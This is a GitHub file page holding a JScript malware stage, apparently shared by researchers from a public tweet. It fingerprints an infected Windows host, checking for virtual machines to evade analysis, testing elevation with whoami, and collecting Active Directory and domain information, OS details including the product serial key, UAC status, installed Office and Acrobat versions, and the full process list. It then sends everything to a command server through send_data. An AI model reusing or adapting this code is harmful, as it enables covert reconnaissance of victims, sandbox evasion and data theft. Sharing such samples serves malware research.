Permalink
Dec 12, 2019
Dec 12, 2019
Newer
100644
172 lines (158 sloc)
6.36 KB
1
/*
2
Source: https://twitter.com/VK_Intel/status/1205205015427727360
4
5
6
function is_vm() {
7
var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');
8
var biosItems = new Enumerator(biosRequest);
9
for (; !biosItems.atEnd(); biosItems.moveNext()) {
10
var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();
11
var serial_number = biosItems.item().SerialNumber.toLowerCase();
12
if (serial_number.indexOf('parallels') >= 0 || serial_number.indexOf('vmware') >= 0) {
13
return true;
14
}
15
if (bios_versoin.indexOf('vmware') >= 0 || bios_versoin.indexOf('virtualbox') >= 0) {
16
return true;
17
}
18
}
19
return false;
20
}
21
22
function get_active_directory_information() {
23
try {
24
var adobj = new ActiveXObject('ADSystemInfo');
25
return adobj.ComputerName;
26
} catch (e) {
27
return false;
28
}
29
}
30
31
function get_env_var(name) {
32
return shell.ExpandEnvironmentStrings(name);
33
}
34
35
function getProc(pid) {
36
return wmi.Get('Win32_process.Handle=' + pid);
37
}
38
39
function getPid() {
40
return 0;
41
}
42
43
function acrobat(arch) {
44
var ret = '';
45
try{
46
var exe = shell.RegRead("HKCR\\Software\\Adobe\\Acrobat\\Exe\\");
47
ret = exe ? exe : '';
48
}catch(e){}
49
return ret;
50
}
51
52
function officeApp(aclass, exe, arch){
53
var ret = '';
54
try {
55
var out = new ActiveXObject(aclass);
56
ret = out.Name + "_" + out.Version + "_";
57
var v = out.Version.split('.')
58
var a = arch.substr(0, 2) != '64' ? 'x86' : null;
59
if (!a) {
60
a = fso.FileExists("C:\\Program Files\\Microsoft Office\\Office" + v[0] + "\\"+exe) ? 'x64' : 'x86';
61
}
62
ret += a;
63
out.Quit(0, 0, 0);
64
} catch (e) {}
65
return ret;
66
}
67
68
function outlook(arch) {
69
return officeApp("Outlook.Application", "OUTLOOK.EXE", arch);
70
}
71
72
function word(arch) {
73
return officeApp("Word.Application", "WINWORD.EXE", arch);
74
}
75
76
function excel(arch) {
77
return officeApp("Excel.Application", "EXCEL.EXE", arch);
78
}
79
80
81
function get_system_information() {
82
var result = [];
83
try {
84
result.push('username***' + get_env_var('%USERNAME%'));
85
result.push('hostname***' + get_env_var('%COMPUTERNAME%'));
86
var elevated = shell.Run('cmd /c whoami /groups | find "12288"', 0, 1);
87
result.push('elevated***' + (elevated == 0 ? 'yes' : 'no'));
88
var owner = wmi.ExecMethod("Win32_Process.Handle='" + getPid() + "'", "GetOwner");
89
result.push('process_owner***' + (owner ? owner.Domain + '\\' + owner.User : 'no'));
90
var ad = get_active_directory_information();
91
if (ad) {
92
result.push('adinformation***' + ad);
93
} else {
94
result.push('adinformation***no_ad');
95
}
96
var csRequest = wmi.ExecQuery('Select * from Win32_ComputerSystem');
97
var csItems = new Enumerator(csRequest);
98
for (; !csItems.atEnd(); csItems.moveNext()) {
99
if (csItems.item().PartOfDomain) {
100
result.push('part_of_domain***yes');
101
} else {
102
result.push('part_of_domain***no');
103
}
104
result.push('pc_domain***' + csItems.item().Domain);
105
result.push('pc_dns_host_name***' + csItems.item().DNSHostName);
106
result.push('pc_model***' + csItems.item().Model);
107
}
108
} catch (e) {
109
result.push('error0***code_error');
110
}
111
try {
112
var osRequest = wmi.ExecQuery('select * from win32_OperatingSystem');
113
var osItems = new Enumerator(osRequest);
114
var arch = null;
115
for (; !osItems.atEnd(); osItems.moveNext()) {
116
result.push('os_name***' + osItems.item().Name);
117
result.push('os_build_number***' + osItems.item().BuildNumber);
118
result.push('os_version***' + osItems.item().Version);
119
result.push('os_sp***' + osItems.item().ServicePackMajorVersion);
120
result.push('os_memory***' + osItems.item().TotalVirtualMemorySize);
121
result.push('os_free_memory***' + osItems.item().FreePhysicalMemory);
122
result.push('os_registered_user***' + osItems.item().RegisteredUser);
123
result.push('os_registered_org***' + osItems.item().Organization);
124
result.push('os_registered_key***' + osItems.item().SerialNumber);
125
result.push('os_last_boot***' + osItems.item().LastBootUpTime);
126
result.push('os_install_date***' + osItems.item().InstallDate);
127
arch = osItems.item().OSArchitecture;
128
result.push('os_arch***' + osItems.item().OSArchitecture);
129
result.push('os_product_type***' + osItems.item().ProductType);
130
result.push('os_language_code***' + osItems.item().OSLanguage);
131
result.push('os_timezone***' + osItems.item().CurrentTimeZone);
132
result.push('os_number_of_users***' + osItems.item().NumberOfUsers);
133
}
134
var dmRequest = wmi.ExecQuery('select * from Win32_DesktopMonitor');
135
var dmItems = new Enumerator(dmRequest);
136
for (; !dmItems.atEnd(); dmItems.moveNext()) {
137
result.push('dm_type***' + dmItems.item().MonitorType);
138
result.push('dm_screen_size***' + dmItems.item().ScreenWidth + 'x' + dmItems.item().ScreenHeight);
139
}
140
if (shell.RegRead('HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA') == 1) {
141
result.push('uac_level***yes');
142
} else {
143
result.push('uac_level***no');
144
}
145
result.push("outlook***" + outlook(arch));
146
result.push("word***" + word(arch));
147
result.push("excel***" + excel(arch));
148
result.push("acrobat***" + acrobat(arch));
149
} catch (e) {
150
result.push('error1***code_error');
151
}
152
try {
153
var pRequest = wmi.ExecQuery('select * from win32_process');
154
var pItems = new Enumerator(pRequest);
155
var process_array = [];
156
for (; !pItems.atEnd(); pItems.moveNext()) {
157
process_array.push(pItems.item().name + '!' + pItems.item().processid);
158
}
159
var process_string = process_array.join('@');
160
result.push('process_list***' + process_string);
161
if (is_vm()) {
162
result.push('is_vm***Yes');
163
} else {
164
result.push('is_vm***No');
165
}
166
} catch (e) {
167
result.push('error2***code_error');
168
}
169
return result.join('^^');
170
}
171
send_data('request', 'page_id=add_info&info=' + encodeURIComponent(get_system_information()), true);
172